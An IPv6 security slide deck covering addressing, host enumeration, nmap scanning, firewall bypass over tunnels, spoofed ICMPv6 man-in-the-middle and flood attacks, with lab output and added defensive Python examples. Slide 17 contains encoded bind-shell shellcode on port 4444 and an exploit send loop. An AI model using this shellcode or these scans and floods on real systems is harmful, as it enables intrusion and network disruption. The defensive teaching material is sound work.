2. Who?
• Don Anto
• Information security manager
• JNCIP-SEC, GSEC, GCIH, GCIA, GPEN, TOGAF
• A dead security researcher
• Involved in the security field for almost 10 years
• Genius evil thinker; professional troublemaker
• @djantoxz
3. IPv6 - Why?
• Analog-to-digital convergence (e.g. Voice over IP)
• The use of virtualization (e.g. Cloud)
• Networking of embedded devices (smartphones, RFID)
• All of these increase the need for unique IP addresses
• So, more IP address space is required!
• Finally, IPv4 address exhaustion
4. IPv6 - What?
• The latest version of the Internet Protocol (IP), intended to replace IPv4
• 128-bit IP addressing instead of 32-bit, to multiply the IP address space
• IPv4 = 2^32 (4,294,967,296) vs. IPv6 = 2^128 (3.4×10^38)
• No longer dotted decimal; hexadecimal groups separated by colons are used instead
• E.G:
• 2001:2c0:cc00:6a01:2d0:b7ff:fe75:d092
• 2001:470:0:64::2
• fe80::1
5. IPv6 Fundamentals
Source: Fernando Gont Presentation
• IPv6 header, 40 Bytes Fixed Length
• Source address 16 bytes, destination address 16 bytes
• 8 bytes for version, traffic class, flow label, payload length, next header, & hop limit
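The fixed 40-byte header layout on this slide is easy to verify with a small parser. The block below is an added example, not code from the slides or from Fernando Gont's material: it serialises and decodes the base header with the field order of RFC 8200 (version, traffic class, flow label, payload length, next header, hop limit, source, destination) and rejects the two malformed cases a defender's parser must handle, a truncated header and a payload length field larger than the bytes actually captured. The sample packet is constructed.

```python
import struct
import ipaddress

IPV6_HEADER_LEN = 40       # fixed length; options live in extension headers, not here
NEXT_HEADER_ICMPV6 = 58    # protocol number carried in the Next Header field


def build_ipv6_header(src, dst, payload, next_header=NEXT_HEADER_ICMPV6,
                      hop_limit=64, traffic_class=0, flow_label=0):
    """Serialise a base IPv6 header (RFC 8200 layout) followed by `payload`."""
    if not 0 <= flow_label < (1 << 20):
        raise ValueError("flow label is a 20-bit field")
    # First 32-bit word: version (4 bits) | traffic class (8) | flow label (20)
    first_word = (6 << 28) | ((traffic_class & 0xFF) << 20) | flow_label
    fixed = struct.pack("!IHBB", first_word, len(payload), next_header, hop_limit)
    return (fixed + ipaddress.IPv6Address(src).packed
            + ipaddress.IPv6Address(dst).packed + payload)


def parse_ipv6_header(packet):
    """Decode the 40-byte base header; raise on malformed input instead of guessing."""
    if len(packet) < IPV6_HEADER_LEN:
        raise ValueError("truncated packet: the base IPv6 header needs 40 bytes")
    first_word, payload_len, next_header, hop_limit = struct.unpack("!IHBB", packet[:8])
    version = first_word >> 28
    if version != 6:
        raise ValueError(f"version field is {version}, not 6")
    if payload_len > len(packet) - IPV6_HEADER_LEN:
        raise ValueError("payload length field exceeds the bytes actually present")
    return {
        "version": version,
        "traffic_class": (first_word >> 20) & 0xFF,
        "flow_label": first_word & 0xFFFFF,
        "payload_length": payload_len,
        "next_header": next_header,
        "hop_limit": hop_limit,
        "src": str(ipaddress.IPv6Address(packet[8:24])),    # 16 bytes
        "dst": str(ipaddress.IPv6Address(packet[24:40])),   # 16 bytes
        "payload": packet[IPV6_HEADER_LEN:IPV6_HEADER_LEN + payload_len],
    }


# Constructed sample: an ICMPv6 echo request stub (type 128) from a link-local
# address to the all-nodes multicast group, hop limit 255 as link-local ICMPv6 uses.
SAMPLE = build_ipv6_header("fe80::a00:27ff:fe39:6f0a", "ff02::1",
                           b"\x80\x00\x00\x00\x12\x34\x00\x01", hop_limit=255)

if __name__ == "__main__":
    for field, value in parse_ipv6_header(SAMPLE).items():
        print(f"{field:15} {value!r}")
```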
6. IPv6 Fundamentals
• IPv6 Address Type:
• Loopback
• Unspecified
• Multicast
• Anycast
• Local unicast
• Global unicast
• Subnetting
• Routing
Source: Fernando Gont Presentation
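The notation from the "IPv6 - What?" slide and the address types listed here can be exercised together. The block below is an added example, not code from the slides: it expands and compresses the textual form, classifies an address into the types above (anycast has no distinct syntax, so it cannot be told apart from unicast), and, going one step beyond the slide, recognises the 6to4 and Teredo prefixes that the tunneling slides later rely on and recovers the IPv4 endpoints embedded in them (RFC 3056 and RFC 4380). The prefix constants are standard; the sample addresses are taken from the slides or constructed.

```python
import ipaddress

# Well-known ranges: RFC 4291 (types), RFC 3056 (6to4), RFC 4380 (Teredo).
LINK_LOCAL = ipaddress.IPv6Network("fe80::/10")
UNIQUE_LOCAL = ipaddress.IPv6Network("fc00::/7")
MULTICAST = ipaddress.IPv6Network("ff00::/8")
GLOBAL_UNICAST = ipaddress.IPv6Network("2000::/3")
SIX_TO_FOUR = ipaddress.IPv6Network("2002::/16")
TEREDO = ipaddress.IPv6Network("2001::/32")
IPV4_MAPPED = ipaddress.IPv6Network("::ffff:0:0/96")

# Multicast scope is the low nibble of the second byte (ff02::1 = link-local scope).
MULTICAST_SCOPES = {1: "interface-local", 2: "link-local", 4: "admin-local",
                    5: "site-local", 8: "organization-local", 0xE: "global"}


def expand(text):
    """Full eight-group form, e.g. for log correlation where '::' varies."""
    return ipaddress.IPv6Address(text).exploded


def compress(text):
    """Canonical short form (RFC 5952) as shown on the slide."""
    return str(ipaddress.IPv6Address(text))


def classify(text):
    a = ipaddress.IPv6Address(text)
    if a == ipaddress.IPv6Address("::"):
        return "unspecified"
    if a == ipaddress.IPv6Address("::1"):
        return "loopback"
    if a in MULTICAST:
        scope = MULTICAST_SCOPES.get(a.packed[1] & 0x0F, "unassigned")
        return f"multicast ({scope} scope)"
    if a in LINK_LOCAL:
        return "link-local unicast"
    if a in UNIQUE_LOCAL:
        return "unique-local unicast"
    if a in IPV4_MAPPED:
        return "IPv4-mapped"
    # Tunnel prefixes are checked before the generic 2000::/3 test they fall inside.
    if a in SIX_TO_FOUR:
        return "global unicast (6to4 tunnel)"
    if a in TEREDO:
        return "global unicast (Teredo tunnel)"
    if a in GLOBAL_UNICAST:
        return "global unicast"
    return "reserved/other"


def embedded_ipv4(text):
    """Recover the IPv4 endpoint(s) a tunnel or mapped address carries, else None."""
    a = ipaddress.IPv6Address(text)
    p = a.packed
    if a in SIX_TO_FOUR:                       # 2002:V4ADDR::/48
        return {"endpoint": str(ipaddress.IPv4Address(p[2:6]))}
    if a in TEREDO:                            # prefix|server|flags|~port|~client
        return {
            "server": str(ipaddress.IPv4Address(p[4:8])),
            "flags": int.from_bytes(p[8:10], "big"),
            "client_port": int.from_bytes(p[10:12], "big") ^ 0xFFFF,
            "client": str(ipaddress.IPv4Address(bytes(b ^ 0xFF for b in p[12:16]))),
        }
    if a in IPV4_MAPPED:
        return {"endpoint": str(ipaddress.IPv4Address(p[12:16]))}
    return None


if __name__ == "__main__":
    for sample in ("2001:2c0:cc00:6a01:2d0:b7ff:fe75:d092", "2001:470:0:64::2",
                   "fe80::1", "ff02::1", "2002:c000:204::1"):
        print(f"{sample:40} {classify(sample)}  {embedded_ipv4(sample)}")
```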
9. Security Issues
• Large IPv6 address space (enumeration, scanning, management)
• The use of tunneling? The use of dual-stack networking?
• Weaknesses in IPv6 itself? (protocol-level vulnerabilities)
• Weaknesses of applications running on IPv6
10. Enumeration
• Discovery through the all-nodes multicast address (FF02::1)
• Discovery through ICMPv6 Echo Request
• Discovery through DNS queries (A vs. AAAA)
• Discovery through SNMP queries
• Google helps to find IPv6-enabled domains
• An IPAM, where present, may also help
ipv6lab->./alive6 eth4
Alive: dead:beaf::3
Alive: dead:beaf::1
Found 2 systems alive
ipv6lab->host -t A www.jp.freebsd.org
www.jp.freebsd.org has address 119.245.129.228
ipv6lab->host -t AAAA www.jp.freebsd.org
www.jp.freebsd.org has IPv6 address 2001:2c0:cc00:6a01:2d0:b7ff:fe75:d092
ipv6lab->ping6 -I eth4 ff02::1
PING ff02::1(ff02::1) from fe80::a00:27ff:fe39:6f0a eth4: 56 data bytes
64 bytes from fe80::a00:27ff:fe39:6f0a: icmp_seq=1 ttl=64 time=0.034 ms
64 bytes from fe80::a00:27ff:fe96:da90: icmp_seq=1 ttl=64 time=1.70 ms (DUP!)
64 bytes from fe80::a00:27ff:fe6c:ea37: icmp_seq=1 ttl=64 time=2.58 ms (DUP!)
ipv6lab->ip -6 neigh show
fe80::a00:27ff:fe96:da90 dev eth4 lladdr 08:00:27:96:da:90 REACHABLE
fe80::a00:27ff:fe6c:ea37 dev eth4 lladdr 08:00:27:6c:ea:37 REACHABLE
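The same two commands the slide uses for discovery also give a defender a quick inventory check. The block below is an added example, not part of the slides: it parses the ping6 and ip -6 neigh output above (copied from the slide), derives the MAC address encoded in each EUI-64 link-local address (the fffe marker and the flipped universal/local bit, RFC 4291 appendix A), and reports hosts answering on FF02::1 whose MAC is not in the asset inventory, plus any host whose advertised link-layer address disagrees with the one its address encodes, which is what a spoofed Neighbor Advertisement looks like from the neighbor table. The KNOWN_MACS inventory is constructed.

```python
import ipaddress
import re

# Output copied from the slide's lab session.
PING6_OUTPUT = """\
PING ff02::1(ff02::1) from fe80::a00:27ff:fe39:6f0a eth4: 56 data bytes
64 bytes from fe80::a00:27ff:fe39:6f0a: icmp_seq=1 ttl=64 time=0.034 ms
64 bytes from fe80::a00:27ff:fe96:da90: icmp_seq=1 ttl=64 time=1.70 ms (DUP!)
64 bytes from fe80::a00:27ff:fe6c:ea37: icmp_seq=1 ttl=64 time=2.58 ms (DUP!)
"""
NEIGH_OUTPUT = """\
fe80::a00:27ff:fe96:da90 dev eth4 lladdr 08:00:27:96:da:90 REACHABLE
fe80::a00:27ff:fe6c:ea37 dev eth4 lladdr 08:00:27:6c:ea:37 REACHABLE
"""
# Constructed asset inventory: the MAC addresses the team knows about.
KNOWN_MACS = {"08:00:27:39:6f:0a", "08:00:27:96:da:90"}

PING_HDR = re.compile(r"^PING \S+ from ([0-9a-f:]+) ")
PING_REPLY = re.compile(r"^\d+ bytes from ([0-9a-f:]+): icmp_seq=")
NEIGH = re.compile(r"^([0-9a-f:]+) dev (\S+) lladdr ([0-9a-f:]{17}) (\S+)")


def mac_from_eui64(addr):
    """MAC encoded in a modified EUI-64 interface identifier, or None if absent."""
    iid = ipaddress.IPv6Address(addr).packed[8:]
    if iid[3:5] != b"\xff\xfe":
        return None                      # privacy/random IID: no MAC to recover
    first = iid[0] ^ 0x02                # flip the universal/local bit back
    mac = bytes([first]) + iid[1:3] + iid[5:8]
    return ":".join(f"{b:02x}" for b in mac)


def parse_ping6(text):
    """Return (our own address, list of other responders)."""
    own, responders = None, []
    for line in text.splitlines():
        m = PING_HDR.match(line)
        if m:
            own = m.group(1)
            continue
        m = PING_REPLY.match(line)
        if m and m.group(1) != own:
            responders.append(m.group(1))
    return own, responders


def parse_neigh(text):
    table = {}
    for line in text.splitlines():
        m = NEIGH.match(line)
        if m:
            table[m.group(1)] = {"dev": m.group(2), "lladdr": m.group(3), "state": m.group(4)}
    return table


def reconcile(ping_text, neigh_text, known_macs):
    own, responders = parse_ping6(ping_text)
    neigh = parse_neigh(neigh_text)
    report = {"self": own, "unknown": [], "mac_mismatch": [], "no_neighbor_entry": []}
    for addr in responders:
        derived = mac_from_eui64(addr)
        entry = neigh.get(addr)
        if entry is None:
            report["no_neighbor_entry"].append(addr)
            observed = derived
        else:
            observed = entry["lladdr"]
            if derived and derived != observed:
                report["mac_mismatch"].append((addr, derived, observed))
        if observed not in known_macs:
            report["unknown"].append((addr, observed))
    return report


if __name__ == "__main__":
    print(reconcile(PING6_OUTPUT, NEIGH_OUTPUT, KNOWN_MACS))
```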
11. Scanning
• Port Scanning (tools with IPv6 support)
• Vulnerability Scanning (tools with IPv6 support)
• A v4-to-v6 proxy is usually helpful, e.g. socat (apt-get install socat)
ipv6lab->nmap -6 -sV -PN -T4 dead:beaf::3
Starting Nmap 5.00 ( http://nmap.org ) at 2013-01-15 15:50 WIT
Interesting ports on dead:beaf::3:
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9 (protocol 2.0)
ipv6lab->nmap -sV -PN -T4 192.168.137.103
Starting Nmap 5.00 ( http://nmap.org ) at 2013-01-15 15:50 WIT
Interesting ports on 192.168.137.103:
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp?
22/tcp open ssh OpenSSH 5.9 (protocol 2.0)
MAC Address: 08:00:27:6C:EA:37 (Cadmus Computer Systems)
12. Perimeter Defense Bypass
• Does the firewall protect both the IPv4 and the IPv6 network?
• Does the IDS/IPS protect both the IPv4 and the IPv6 network?
• Teredo tunneling can be used to bypass NAT and to compromise the internal network
• The use of dual-stack and tunneling mandates protection for both IPv4 and IPv6
13. Perimeter Defense Bypass
• IPv4 is well governed by firewalls using NAT or policies
• Poor firewall configuration can potentially be used to bypass access controls and reach the DMZ over IPv6
• Even worse, someone may directly access the internal network from the Internet
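The gap described on the two perimeter slides is a parity problem: the IPv4 policy is explicit, the IPv6 policy is an afterthought. The block below is an added example, not from the slides: a small first-match rule evaluator, a constructed DMZ policy where IPv4 is locked down but IPv6 is a single "allow 2001:db8::/32" rule, and a parity check that asks, for each dual-stacked service, whether the decision is the same over both families. The hardened IPv6 rule set mirrors the IPv4 one and closes every gap. All networks, hosts and rules are constructed (RFC 5737 / RFC 3849 documentation ranges).

```python
from dataclasses import dataclass
from typing import Optional
import ipaddress


@dataclass(frozen=True)
class Rule:
    action: str            # "allow" or "deny"
    dst: str               # destination network; its version selects the family
    dport: Optional[int]   # None matches any port
    proto: str = "any"     # "tcp", "udp" or "any"


def decide(rules, dst_ip, dport, proto="tcp", default="deny"):
    """First-match evaluation, the way most packet filters work."""
    ip = ipaddress.ip_address(dst_ip)
    for r in rules:
        net = ipaddress.ip_network(r.dst)
        if net.version != ip.version or ip not in net:
            continue
        if r.dport is not None and r.dport != dport:
            continue
        if r.proto != "any" and r.proto != proto:
            continue
        return r.action
    return default


def parity_gaps(rules, services):
    """Services reachable over one family but not the other."""
    gaps = []
    for name, v4, v6, port, proto in services:
        d4 = decide(rules, v4, port, proto)
        d6 = decide(rules, v6, port, proto)
        if d4 != d6:
            gaps.append((name, port, d4, d6))
    return gaps


# Constructed IPv4 policy: DMZ web only; the internal 10.0.0.0/8 sits behind NAT
# and is unreachable by default.
DMZ_V4 = [
    Rule("allow", "192.0.2.10/32", 80, "tcp"),
    Rule("allow", "192.0.2.10/32", 443, "tcp"),
    Rule("deny", "192.0.2.0/24", None),
]
# The "just let IPv6 through" rule an administrator adds so dual-stack works.
WEAK_V6 = [Rule("allow", "2001:db8::/32", None)]
# Corrected IPv6 policy: mirror the IPv4 rules and end with an explicit deny.
HARDENED_V6 = [
    Rule("allow", "2001:db8:1::10/128", 80, "tcp"),
    Rule("allow", "2001:db8:1::10/128", 443, "tcp"),
    Rule("deny", "::/0", None),
]
# Dual-stacked services: (name, IPv4, IPv6, port, proto); all constructed.
SERVICES = [
    ("dmz-web", "192.0.2.10", "2001:db8:1::10", 80, "tcp"),
    ("dmz-ssh", "192.0.2.10", "2001:db8:1::10", 22, "tcp"),
    ("internal-smb", "10.0.0.5", "2001:db8:2::5", 445, "tcp"),
]

if __name__ == "__main__":
    print("weak:    ", parity_gaps(DMZ_V4 + WEAK_V6, SERVICES))
    print("hardened:", parity_gaps(DMZ_V4 + HARDENED_V6, SERVICES))
```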
14. Exploiting - Protocols
• IPv6 was also designed to improve on the security of IPv4; unfortunately there is no significant improvement
• Some problems of IPv4 still persist in IPv6
• Man-in-the-Middle Attack
• Denial of Service Attack
• More and more
15. Man In The Middle
• Spoofed ICMPv6 Neighbor Advertisement (replacing ARP spoofing in v4)
• Spoofed ICMPv6 Router Advertisement
• Spoofed ICMPv6 Redirect or ICMPv6 Packet Too Big to implant a route
• Rogue DHCPv6 Server (replacing the rogue DHCP server in v4)
• More and more
Image source: OWASP website
Used to help packet sniffing
16. Denial of Service
• Traffic flooding with ICMPv6 RA, NA, NS, MLD, smurfing
• Preventing new IPv6 addresses with DAD
• CPU exhaustion with ICMPv6 NS and a lot of crypto stuff
• Routing loop attack utilizing automatic tunneling
• ICMP attack against TCP to tear down BGP sessions
anto# ifstat -b
       eth0
 Kbps in  Kbps out
 9851.48      1.08
10244.34      0.95
10313.33      0.95
 9165.56      0.95
 9358.11      0.95
10165.01      0.95
 9802.98      0.95
 9353.34      0.95
anto# tcpdump -n -i eth0 dst host dead:beaf::3
20:39:48.442267 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24
20:39:48.442290 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24
20:39:48.442314 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24
20:39:48.442337 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24
20:39:48.442585 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24
4700 packets captured
4884 packets received by filter
93 packets dropped by kernel
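Both the man-in-the-middle slide and this one describe traffic that is visible in a tcpdump summary line, so one detector serves both. The block below is an added example, not from the slides: it parses tcpdump lines in the format shown above, and raises an alert for (a) a packet whose source address is multicast, which no legitimate host ever sends and which is the signature of the spoofed flood in the capture, (b) a Router Advertisement or Redirect from an address that is not an authorised router, which is the check RA Guard performs on the switch, and (c) echo requests per destination per second above a threshold. The first five capture lines are copied from the slide; the remaining lines and the ALLOWED_ROUTERS set are constructed.

```python
import ipaddress
import re
from collections import Counter, namedtuple

MULTICAST = ipaddress.IPv6Network("ff00::/8")

# tcpdump summary lines: the first five are from the slide, the rest are constructed
# to show a legitimate RA, an RA from an ordinary host, and a redirect from that host.
CAPTURE = """\
20:39:48.442267 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24
20:39:48.442290 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24
20:39:48.442314 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24
20:39:48.442337 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24
20:39:48.442585 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24
20:39:49.000100 IP6 fe80::1 > ff02::1: ICMP6, router advertisement, length 64
20:39:49.000200 IP6 fe80::a00:27ff:fe6c:ea37 > ff02::1: ICMP6, router advertisement, length 64
20:39:49.000300 IP6 fe80::a00:27ff:fe6c:ea37 > fe80::a00:27ff:fe96:da90: ICMP6, redirect, dead:beaf::1 to fe80::a00:27ff:fe6c:ea37, length 40
"""
ALLOWED_ROUTERS = {"fe80::1"}   # constructed: link-local address of the real router

LINE = re.compile(r"^(\d\d:\d\d:\d\d)\.\d+ IP6 ([0-9a-f:]+) > ([0-9a-f:]+): ICMP6, ([^,]+),")
Packet = namedtuple("Packet", "second src dst kind")


def parse(text):
    """Keep the second, source, destination and ICMPv6 message kind of each line."""
    pkts = []
    for line in text.splitlines():
        m = LINE.match(line)
        if m:
            pkts.append(Packet(*m.groups()))
    return pkts


def analyze(text, allowed_routers, echo_per_second_limit=1000):
    alerts = []
    echo = Counter()
    for p in parse(text):
        if ipaddress.IPv6Address(p.src) in MULTICAST:
            # A multicast address can never be a source: forged, used for reflection.
            alerts.append(("spoofed-multicast-source", p.second, p.src, p.dst))
        if p.kind == "router advertisement" and p.src not in allowed_routers:
            alerts.append(("rogue-ra", p.second, p.src, p.dst))
        if p.kind == "redirect" and p.src not in allowed_routers:
            alerts.append(("redirect-from-non-router", p.second, p.src, p.dst))
        if p.kind == "echo request":
            echo[(p.dst, p.second)] += 1
    for (dst, second), n in sorted(echo.items()):
        if n > echo_per_second_limit:
            alerts.append(("echo-flood", second, dst, n))
    return alerts


def summary(alerts):
    """Alert counts by kind, the shape a dashboard or SIEM rule would consume."""
    return Counter(a[0] for a in alerts)


if __name__ == "__main__":
    for a in analyze(CAPTURE, ALLOWED_ROUTERS, echo_per_second_limit=4):
        print(a)
```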
17. Exploiting - Apps
• Buffer Overflow
• Remote Format String
• Off-By-One
• Web App Attacks
• More Attacks?!
• There's no big difference
• Socket programming & shellcodes
/* Excerpt shown on the slide; AddrInfo, buffer, len and s are declared elsewhere. */
char shellcode[] = /* Portbind @ 4444 */
"\xd9\xcc\xbd\x59\x34\x55\x97\xd9\x74\x24\xf4\x5a\x29\xc9"
"\xb1\x17\x31\x6a\x19\x83\xc2\x04\x03\x6a\x15\xbb\xc1\x64"
"\x4c\x68\x69\xd4\x18\x84\xe4\x3b\xb6\xfe\xae\x76\xc7\x68"
"\xd7\xdb\x9a\xc6\xba\x89\x48\x80\x52\x3f\x31\x2a\xcb\x35"
"\xc9\x3b\xea\x20\xd5\x6a\xbb\x3d\x04\xcf\x29\x58\x9f\x02"
"\x2d\x14\x79\x2f\x2a\x98\x06\x1d\x61\x74\x8e\x40\xc6\xc8"
"\xf6\x4f\x49\xbb\xae\x25\x75\xe4\x9d\x39\xc0\x6d\xe6\x51"
"\xfc\xa2\x65\xc9\x6a\x92\xeb\x60\x05\x65\x08\x22\x8a\xfc"
"\x2e\x72\x27\x32\x30";

/* Walk the getaddrinfo() result list: the same loop serves IPv4 and IPv6 entries. */
for (AI = AddrInfo; AI != NULL; AI = AI->ai_next) {
    if ((s = socket(AI->ai_family, AI->ai_socktype, AI->ai_protocol)) < 0) {
        printf("can't create socket\n");
        exit(0);
    }
    connect(s, AI->ai_addr, AI->ai_addrlen);
    send(s, buffer, len, 0);
    printf("Check your shell on %s TCP port 4444\n", argv[1]);
}
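The slide's point is that a getaddrinfo() loop is address-family agnostic: any client or tool written this way reaches an IPv6 host exactly as it reaches an IPv4 one, which is why application hardening and monitoring cannot stop at the IPv4 listener. The block below is an added example, not code from the slide: the same iterate-until-connect loop in Python, applied to a constructed local echo service so it runs offline. Names such as connect_any and start_echo_server are the example's own.

```python
import socket
import threading


def family_name(fam):
    return {socket.AF_INET: "IPv4", socket.AF_INET6: "IPv6"}.get(fam, "other")


def candidates(host, port):
    """Every (family, sockaddr) getaddrinfo() offers for host; AF_UNSPEC = both families."""
    return [(family_name(fam), sockaddr) for fam, _t, _p, _c, sockaddr in
            socket.getaddrinfo(host, port, socket.AF_UNSPEC, socket.SOCK_STREAM)]


def connect_any(host, port, timeout=2.0):
    """Try each getaddrinfo() entry in turn (the slide's ai_next loop); return the first
    connected socket. Nothing in here knows or cares which IP version it is using."""
    last = None
    for fam, _t, proto, _c, sockaddr in socket.getaddrinfo(
            host, port, socket.AF_UNSPEC, socket.SOCK_STREAM):
        s = socket.socket(fam, socket.SOCK_STREAM, proto)
        s.settimeout(timeout)
        try:
            s.connect(sockaddr)
            return s
        except OSError as exc:
            last = exc
            s.close()
    raise OSError(f"no address of {host} accepted a connection on port {port}") from last


def start_echo_server(bind_addr="127.0.0.1"):
    """Constructed stand-in for a service: serves one connection, echoes what it gets.
    Returns the ephemeral port the kernel picked."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((bind_addr, 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def serve():
        conn, _peer = srv.accept()
        with conn:
            conn.sendall(conn.recv(1024))
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return port


def roundtrip(host, port, payload=b"same code path for v4 and v6"):
    """Connect with connect_any(), send, and return (family used, echoed bytes)."""
    with connect_any(host, port) as s:
        s.sendall(payload)
        return family_name(s.family), s.recv(1024)


if __name__ == "__main__":
    port = start_echo_server()
    print(candidates("127.0.0.1", port))
    print(roundtrip("127.0.0.1", port))
```

In the C loop on the slide nothing selects IPv4 or IPv6 either; the family comes from whatever the resolver returns, so a host that publishes an AAAA record is reached over IPv6 by every such client without anyone choosing it.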